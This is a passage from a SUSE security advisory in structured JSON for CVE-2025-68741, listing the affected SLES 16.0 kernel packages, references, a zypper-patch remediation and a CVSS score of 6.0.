"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68741",
"url": "https://www.suse.com/security/cve/CVE-2025-68741"
},
{
"category": "external",
"summary": "SUSE Bug 1255703 for CVE-2025-68741",
"url": "https://bugzilla.suse.com/1255703"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
